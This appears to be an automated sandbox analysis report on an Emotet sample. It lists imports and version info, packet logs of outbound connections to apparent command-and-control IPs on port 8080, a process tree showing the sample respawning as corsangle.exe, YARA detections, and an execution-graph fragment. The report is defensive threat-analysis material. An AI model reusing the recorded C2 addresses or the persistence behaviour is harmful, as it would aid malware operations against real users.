                                                                            KERNEL32.dllVirtualQuery, GetStartupInfoA, GetCommandLineA, ExitProcess, TerminateProcess, HeapReAlloc, HeapSize, HeapDestroy, HeapCreate, VirtualFree, IsBadWritePtr, LCMapStringA, LCMapStringW, SetUnhandledExceptionFilter, GetStdHandle, UnhandledExceptionFilter, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetSystemInfo, SetHandleCount, GetFileType, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, GetStringTypeA, GetStringTypeW, GetTimeZoneInformation, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, IsValidCodePage, IsBadReadPtr, IsBadCodePtr, SetStdHandle, GetLocaleInfoW, SetEnvironmentVariableA, GetProcAddress, VirtualAlloc, VirtualProtect, HeapFree, RtlUnwind, HeapAlloc, GetTickCount, GetFileTime, GetFileAttributesA, FileTimeToLocalFileTime, SetErrorMode, FileTimeToSystemTime, GetOEMCP, GetCPInfo, CreateFileA, GetFullPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, LocalAlloc, DeleteCriticalSection, InitializeCriticalSection, RaiseException, GlobalFlags, InterlockedIncrement, WritePrivateProfileStringA, GlobalGetAtomNameA, GlobalFindAtomA, lstrcatA, lstrcmpW, SetLastError, MulDiv, FormatMessageA, lstrcpynA, LocalFree, GlobalUnlock, GlobalFree, FreeResource, CloseHandle, GlobalAddAtomA, FindResourceA, LoadResource, LockResource, SizeofResource, GetCurrentThread, GetCurrentThreadId, GlobalLock, GlobalAlloc, FreeLibrary, GlobalDeleteAtom, lstrcmpA, GetModuleFileNameA, GetModuleHandleA, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcpyA, LoadLibraryA, CompareStringW, CompareStringA, lstrlenA, lstrcmpiA, GetVersion, GetLastError, MultiByteToWideChar, InterlockedDecrement, WideCharToMultiByte, GetVersionExA, GetThreadLocale, GetLocaleInfoA, GetACP, InterlockedExchange, GetModuleHandleW, LoadLibraryW, GetEnvironmentStringsW
                                                                            USER32.dllDestroyMenu, MessageBeep, GetNextDlgGroupItem, InvalidateRgn, InvalidateRect, CopyAcceleratorTableA, SetRect, IsRectEmpty, CharNextA, GetSysColorBrush, ReleaseCapture, LoadCursorA, SetCapture, EndPaint, BeginPaint, GetWindowDC, ReleaseDC, GetDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, ShowWindow, MoveWindow, IsDialogMessageA, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassInfoExA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SendDlgItemMessageA, IsChild, GetForegroundWindow, GetTopWindow, GetMessageTime, GetMessagePos, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, GetSysColor, AdjustWindowRectEx, EqualRect, GetClassInfoA, RegisterClassA, UnregisterClassA, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, MessageBoxA, DrawIcon, SendMessageA, IsIconic, GetClientRect, EnableWindow, GetSystemMetrics, LoadIconA, CharUpperA, PostMessageA, SetWindowTextA, OffsetRect, IntersectRect, SystemParametersInfoA, GetWindowPlacement, GetWindowRect, CopyRect, PtInRect, wsprintfA, GetWindowTextLengthA, GetWindowTextA, SetFocus, UnhookWindowsHookEx, PostThreadMessageA, GetMenuItemID, GetMenuItemCount, GetSubMenu, GetWindow, SetWindowContextHelpId, MapDialogRect, SetWindowPos, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, RegisterClipboardFormatA, PostQuitMessage, SetCursor, IsWindowEnabled, GetLastActivePopup, GetWindowLongA, GetParent, ValidateRect, GetCursorPos, PeekMessageA, GetKeyState, IsWindowVisible, GetActiveWindow, DispatchMessageA, TranslateMessage, GetMessageA, CallNextHookEx, SetWindowsHookExA, LoadBitmapA, GetMenuCheckMarkDimensions, CheckMenuItem, EnableMenuItem, GetMenuState, ModifyMenuA, GetFocus, SetMenuItemBitmaps, EndDialog, GetNextDlgTabItem, GetDlgItem, IsWindow, DestroyWindow
                                                                            GDI32.dllGetBkColor, GetTextColor, CreateRectRgnIndirect, GetRgnBox, GetMapMode, GetStockObject, DeleteDC, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, CreateBitmap, SelectObject, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, GetWindowExtEx, GetViewportExtEx, DeleteObject, SetMapMode, RestoreDC, SaveDC, GetObjectA, SetBkColor, SetTextColor, GetClipBox, GetDeviceCaps, SetViewportOrgEx
                                                                            comdlg32.dllGetFileTitleA
                                                                            WINSPOOL.DRVOpenPrinterA, DocumentPropertiesA, ClosePrinter
                                                                            ADVAPI32.dllRegCloseKey, RegQueryValueExA, RegOpenKeyExA, RegDeleteKeyA, RegEnumKeyA, RegOpenKeyA, RegQueryValueA, RegCreateKeyExA, RegSetValueExA, SetFileSecurityW
                                                                            COMCTL32.dll
                                                                            SHLWAPI.dllPathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
                                                                            oledlg.dll
                                                                            ole32.dllStgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CoTaskMemAlloc, CreateILockBytesOnHGlobal, CoTaskMemFree, CLSIDFromString, CLSIDFromProgID, CoInitialize, CoCreateInstance, OleRun, CoUninitialize, OleUninitialize, CoFreeUnusedLibraries, OleInitialize, CoRegisterMessageFilter, OleFlushClipboard, OleIsCurrentClipboard, CoRevokeClassObject
                                                                            OLEAUT32.dllSysAllocString, SysAllocStringByteLen, SysStringByteLen, SysFreeString, VariantInit, VariantCopy, VariantChangeType, VariantClear, SysAllocStringLen, SysStringLen, OleCreateFontIndirect, SystemTimeToVariantTime, SafeArrayDestroy, GetErrorInfo

                                                                            Version Infos

                                                                            DescriptionData
                                                                            LegalCopyrightCopyright (C) 2003
                                                                            InternalNameMSADODLG
                                                                            FileVersion1, 0, 0, 1
                                                                            CompanyNameMAFIA
                                                                            PrivateBuild
                                                                            LegalTrademarks
                                                                            Commentsby: Haitham hamed/The_Pharoh
                                                                            ProductNameMSADODLG Application
                                                                            SpecialBuild
                                                                            ProductVersion1, 0, 0, 1
                                                                            FileDescriptionMSADODLG MFC Application
                                                                            OriginalFilenameMSADODLG.EXE
                                                                            Translation0x0409 0x04b0

                                                                            Possible Origin

                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States
                                                                            ArabicSaudi Arabia

                                                                            Network Behavior

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 7, 2021 06:50:30.022336960 CEST497298080192.168.2.3104.236.137.72
                                                                            Apr 7, 2021 06:50:30.202459097 CEST808049729104.236.137.72192.168.2.3
                                                                            Apr 7, 2021 06:50:30.734514952 CEST497298080192.168.2.3104.236.137.72
                                                                            Apr 7, 2021 06:50:30.915384054 CEST808049729104.236.137.72192.168.2.3
                                                                            Apr 7, 2021 06:50:31.422058105 CEST497298080192.168.2.3104.236.137.72
                                                                            Apr 7, 2021 06:50:31.601778030 CEST808049729104.236.137.72192.168.2.3
                                                                            Apr 7, 2021 06:50:35.322638035 CEST497308080192.168.2.3172.104.233.225
                                                                            Apr 7, 2021 06:50:38.328885078 CEST497308080192.168.2.3172.104.233.225
                                                                            Apr 7, 2021 06:50:44.329427004 CEST497308080192.168.2.3172.104.233.225
                                                                            Apr 7, 2021 06:51:00.585378885 CEST497408080192.168.2.3213.189.36.51
                                                                            Apr 7, 2021 06:51:00.622391939 CEST808049740213.189.36.51192.168.2.3
                                                                            Apr 7, 2021 06:51:01.127821922 CEST497408080192.168.2.3213.189.36.51
                                                                            Apr 7, 2021 06:51:01.165400028 CEST808049740213.189.36.51192.168.2.3
                                                                            Apr 7, 2021 06:51:01.674595118 CEST497408080192.168.2.3213.189.36.51
                                                                            Apr 7, 2021 06:51:01.711533070 CEST808049740213.189.36.51192.168.2.3
                                                                            Apr 7, 2021 06:51:05.357662916 CEST497418080192.168.2.385.234.143.94
                                                                            Apr 7, 2021 06:51:08.362636089 CEST497418080192.168.2.385.234.143.94
                                                                            Apr 7, 2021 06:51:14.378770113 CEST497418080192.168.2.385.234.143.94
                                                                            Apr 7, 2021 06:51:30.671153069 CEST497448080192.168.2.3119.59.124.163
                                                                            Apr 7, 2021 06:51:30.854068995 CEST808049744119.59.124.163192.168.2.3
                                                                            Apr 7, 2021 06:51:31.364742041 CEST497448080192.168.2.3119.59.124.163
                                                                            Apr 7, 2021 06:51:31.546861887 CEST808049744119.59.124.163192.168.2.3
                                                                            Apr 7, 2021 06:51:32.052309036 CEST497448080192.168.2.3119.59.124.163
                                                                            Apr 7, 2021 06:51:32.234468937 CEST808049744119.59.124.163192.168.2.3
                                                                            Apr 7, 2021 06:51:36.327295065 CEST497458080192.168.2.3190.146.131.105
                                                                            Apr 7, 2021 06:51:39.334032059 CEST497458080192.168.2.3190.146.131.105
                                                                            Apr 7, 2021 06:51:45.334573030 CEST497458080192.168.2.3190.146.131.105

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Apr 7, 2021 06:49:38.551395893 CEST6015253192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:49:38.564142942 CEST53601528.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:49:43.946746111 CEST5754453192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:49:43.960174084 CEST53575448.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:49:45.708499908 CEST5598453192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:49:45.721539021 CEST53559848.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:49:46.493990898 CEST6418553192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:49:46.507539034 CEST53641858.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:49:47.644478083 CEST6511053192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:49:47.658668041 CEST53651108.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:10.202346087 CEST5836153192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:10.241022110 CEST53583618.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:13.217879057 CEST6349253192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:13.231161118 CEST53634928.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:13.891305923 CEST6083153192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:13.904072046 CEST53608318.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:14.647017956 CEST6010053192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:14.660334110 CEST53601008.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:15.517189026 CEST5319553192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:15.531023026 CEST53531958.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:16.806775093 CEST5014153192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:16.819835901 CEST53501418.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:18.904903889 CEST5302353192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:18.919095993 CEST53530238.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:19.660454035 CEST4956353192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:19.673875093 CEST53495638.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:20.446872950 CEST5135253192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:20.458775997 CEST53513528.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:20.761080980 CEST5934953192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:20.780473948 CEST53593498.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:21.239820957 CEST5708453192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:21.253297091 CEST53570848.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:22.039150000 CEST5882353192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:22.051822901 CEST53588238.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:22.803833961 CEST5756853192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:22.816128016 CEST53575688.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:23.726583958 CEST5054053192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:23.740210056 CEST53505408.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:24.402729034 CEST5436653192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:24.421847105 CEST53543668.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:25.968115091 CEST5303453192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:25.981112003 CEST53530348.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:38.439985037 CEST5776253192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:38.466201067 CEST53577628.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:45.559355021 CEST5543553192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:45.572110891 CEST53554358.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:50:48.867105961 CEST5071353192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:50:48.888035059 CEST53507138.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:51:20.705039024 CEST5613253192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:51:20.719325066 CEST53561328.8.8.8192.168.2.3
                                                                            Apr 7, 2021 06:51:22.271953106 CEST5898753192.168.2.38.8.8.8
                                                                            Apr 7, 2021 06:51:22.307223082 CEST53589878.8.8.8192.168.2.3

                                                                            Code Manipulations

                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            Analysis Process: lK8vF3n2e7.exe PID: 460 Parent PID: 5676

                                                                            General

                                                                            Start time:06:49:42
                                                                            Start date:07/04/2021
                                                                            Path:C:\Users\user\Desktop\lK8vF3n2e7.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:'C:\Users\user\Desktop\lK8vF3n2e7.exe'
                                                                            Imagebase:0x400000
                                                                            File size:397714 bytes
                                                                            MD5 hash:D7CD602EB9E9AD8272D4AD0910815835
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.194289287.0000000000591000.00000020.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Emotet, Description: Emotet Payload, Source: 00000000.00000002.194289287.0000000000591000.00000020.00000001.sdmp, Author: kevoreilly
                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000000.00000002.194269122.0000000000570000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Emotet, Description: Emotet Payload, Source: 00000000.00000002.194269122.0000000000570000.00000040.00000001.sdmp, Author: kevoreilly
                                                                            Reputation:low

                                                                            Chronological Activities

                                                                            Analysis Process: svchost.exe PID: 3708 Parent PID: 568

                                                                            General

                                                                            Start time:06:49:42
                                                                            Start date:07/04/2021
                                                                            Path:C:\Windows\System32\svchost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                            Imagebase:0x7ff7488e0000
                                                                            File size:51288 bytes
                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: lK8vF3n2e7.exe PID: 4144 Parent PID: 460

                                                                            General

                                                                            Start time:06:49:47
                                                                            Start date:07/04/2021
                                                                            Path:C:\Users\user\Desktop\lK8vF3n2e7.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:--b0af2bca
                                                                            Imagebase:0x400000
                                                                            File size:397714 bytes
                                                                            MD5 hash:D7CD602EB9E9AD8272D4AD0910815835
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Emotet, Description: Emotet Payload, Source: 00000002.00000002.233128075.0000000002221000.00000020.00000001.sdmp, Author: kevoreilly
                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.233094123.00000000021E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Emotet, Description: Emotet Payload, Source: 00000002.00000002.233094123.00000000021E0000.00000040.00000001.sdmp, Author: kevoreilly
                                                                            Reputation:low

                                                                            Chronological Activities

                                                                            Analysis Process: corsangle.exe PID: 6128 Parent PID: 568

                                                                            General

                                                                            Start time:06:49:58
                                                                            Start date:07/04/2021
                                                                            Path:C:\Windows\SysWOW64\corsangle.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:C:\Windows\SysWOW64\corsangle.exe
                                                                            Imagebase:0x400000
                                                                            File size:397714 bytes
                                                                            MD5 hash:D7CD602EB9E9AD8272D4AD0910815835
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.229558668.0000000000E30000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Emotet, Description: Emotet Payload, Source: 00000003.00000002.229558668.0000000000E30000.00000040.00000001.sdmp, Author: kevoreilly
                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000003.00000002.229583434.0000000000E51000.00000020.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Emotet, Description: Emotet Payload, Source: 00000003.00000002.229583434.0000000000E51000.00000020.00000001.sdmp, Author: kevoreilly
                                                                            Reputation:low

                                                                            Chronological Activities

                                                                            Analysis Process: corsangle.exe PID: 5496 Parent PID: 6128

                                                                            General

                                                                            Start time:06:50:03
                                                                            Start date:07/04/2021
                                                                            Path:C:\Windows\SysWOW64\corsangle.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:--2e5419fc
                                                                            Imagebase:0x400000
                                                                            File size:397714 bytes
                                                                            MD5 hash:D7CD602EB9E9AD8272D4AD0910815835
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.456108284.0000000000700000.00000040.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Emotet, Description: Emotet Payload, Source: 00000004.00000002.456108284.0000000000700000.00000040.00000001.sdmp, Author: kevoreilly
                                                                            • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000004.00000002.456134629.0000000000721000.00000020.00000001.sdmp, Author: Joe Security
                                                                            • Rule: Emotet, Description: Emotet Payload, Source: 00000004.00000002.456134629.0000000000721000.00000020.00000001.sdmp, Author: kevoreilly
                                                                            Reputation:low

                                                                            Chronological Activities

                                                                            Analysis Process: svchost.exe PID: 4280 Parent PID: 568

                                                                            General

                                                                            Start time:06:50:11
                                                                            Start date:07/04/2021
                                                                            Path:C:\Windows\System32\svchost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                            Imagebase:0x7ff7488e0000
                                                                            File size:51288 bytes
                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: svchost.exe PID: 1540 Parent PID: 568

                                                                            General

                                                                            Start time:06:50:17
                                                                            Start date:07/04/2021
                                                                            Path:C:\Windows\System32\svchost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                            Imagebase:0x7ff7488e0000
                                                                            File size:51288 bytes
                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: svchost.exe PID: 2440 Parent PID: 568

                                                                            General

                                                                            Start time:06:50:25
                                                                            Start date:07/04/2021
                                                                            Path:C:\Windows\System32\svchost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                            Imagebase:0x7ff7488e0000
                                                                            File size:51288 bytes
                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: svchost.exe PID: 244 Parent PID: 568

                                                                            General

                                                                            Start time:06:50:28
                                                                            Start date:07/04/2021
                                                                            Path:C:\Windows\System32\svchost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                            Imagebase:0x7ff7488e0000
                                                                            File size:51288 bytes
                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: svchost.exe PID: 2592 Parent PID: 568

                                                                            General

                                                                            Start time:06:50:29
                                                                            Start date:07/04/2021
                                                                            Path:C:\Windows\System32\svchost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                            Imagebase:0x7ff7488e0000
                                                                            File size:51288 bytes
                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: svchost.exe PID: 1140 Parent PID: 568

                                                                            General

                                                                            Start time:06:50:29
                                                                            Start date:07/04/2021
                                                                            Path:C:\Windows\System32\svchost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                            Imagebase:0x7ff7488e0000
                                                                            File size:51288 bytes
                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: svchost.exe PID: 6008 Parent PID: 568

                                                                            General

                                                                            Start time:06:50:29
                                                                            Start date:07/04/2021
                                                                            Path:C:\Windows\System32\svchost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                            Imagebase:0x7ff7488e0000
                                                                            File size:51288 bytes
                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: svchost.exe PID: 3012 Parent PID: 568

                                                                            General

                                                                            Start time:06:50:30
                                                                            Start date:07/04/2021
                                                                            Path:C:\Windows\System32\svchost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                            Imagebase:0x7ff7488e0000
                                                                            File size:51288 bytes
                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: SgrmBroker.exe PID: 5248 Parent PID: 568

                                                                            General

                                                                            Start time:06:50:31
                                                                            Start date:07/04/2021
                                                                            Path:C:\Windows\System32\SgrmBroker.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                            Imagebase:0x7ff759a20000
                                                                            File size:163336 bytes
                                                                            MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: svchost.exe PID: 4276 Parent PID: 568

                                                                            General

                                                                            Start time:06:50:31
                                                                            Start date:07/04/2021
                                                                            Path:C:\Windows\System32\svchost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                            Imagebase:0x7ff7488e0000
                                                                            File size:51288 bytes
                                                                            MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: MpCmdRun.exe PID: 5836 Parent PID: 4276

                                                                            General

                                                                            Start time:06:51:32
                                                                            Start date:07/04/2021
                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                            Imagebase:0x7ff6a38a0000
                                                                            File size:455656 bytes
                                                                            MD5 hash:A267555174BFA53844371226F482B86B
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Analysis Process: conhost.exe PID: 3892 Parent PID: 5836

                                                                            General

                                                                            Start time:06:51:32
                                                                            Start date:07/04/2021
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6b2800000
                                                                            File size:625664 bytes
                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high

                                                                            Chronological Activities

                                                                            Disassembly

                                                                            Code Analysis

                                                                            Reset < >

                                                                              Analysis Process: lK8vF3n2e7.exe PID: 460 Parent PID: 5676 lK8vF3n2e7.exeCOMMON

                                                                              Execution Graph

                                                                              Execution Coverage:6.3%
                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                              Signature Coverage:44.4%
                                                                              Total number of Nodes:2000
                                                                              Total number of Limit Nodes:46

                                                                              Graph

                                                                              execution_graph 27434 428bcb 8 API calls 27435 42c5e9 27436 42c5f7 27435->27436 27439 42c51f 27436->27439 27437 42c624 27440 42c553 27439->27440 27441 42c5db RegCloseKey 27439->27441 27442 42c554 RegOpenKeyExA 27440->27442 27443 42c5c3 RegCloseKey 27440->27443 27445 42c571 RegQueryValueExA 27440->27445 27441->27437 27442->27440 27442->27443 27443->27442 27444 42c5da 27443->27444 27444->27441 27445->27440 27446 416eba SetUnhandledExceptionFilter 27447 412d5e 27448 412d6a ___initmbctable _fast_error_exit 27447->27448 27449 412d76 GetVersionExA 27448->27449 27450 412db2 27449->27450 27451 412dbe GetModuleHandleA 27449->27451 27450->27451 27452 412dda 27451->27452 27499 414943 HeapCreate 27452->27499 27454 412e2c 27455 412e38 27454->27455 27524 412d3a 36 API calls _fast_error_exit 27454->27524 27525 41640c 45 API calls _TranslateName 27455->27525 27458 412e3e 27459 412e42 27458->27459 27460 412e4a 27458->27460 27526 412d3a 36 API calls _fast_error_exit 27459->27526 27507 4178f9 41 API calls 2 library calls 27460->27507 27462 412e49 27462->27460 27464 412e57 27465 412e63 GetCommandLineA 27464->27465 27466 412e5b 27464->27466 27508 4177d7 44 API calls 3 library calls 27465->27508 27527 412d15 36 API calls _fast_error_exit 27466->27527 27469 412e62 27469->27465 27470 412e73 27528 417735 66 API calls 2 library calls 27470->27528 27472 412e7d 27473 412e81 27472->27473 27474 412e89 27472->27474 27529 412d15 36 API calls _fast_error_exit 27473->27529 27509 417502 65 API calls 5 library calls 27474->27509 27477 412e88 27477->27474 27478 412e8e 27479 412e92 27478->27479 27480 412e9a 27478->27480 27530 412d15 36 API calls _fast_error_exit 27479->27530 27510 413057 40 API calls 27480->27510 27483 412e99 27483->27480 27484 412ea1 27485 412eb0 GetStartupInfoA 27484->27485 27486 412ea9 27484->27486 27511 4174a5 65 API calls 2 library calls 27485->27511 27531 412d15 36 API calls _fast_error_exit 27486->27531 27489 412eaf 27489->27485 27490 412ec2 27491 412ecb 27490->27491 27492 412ed4 GetModuleHandleA 27491->27492 27512 4224cb 27492->27512 27495 412ef2 27533 4131a6 36 API calls _fast_error_exit 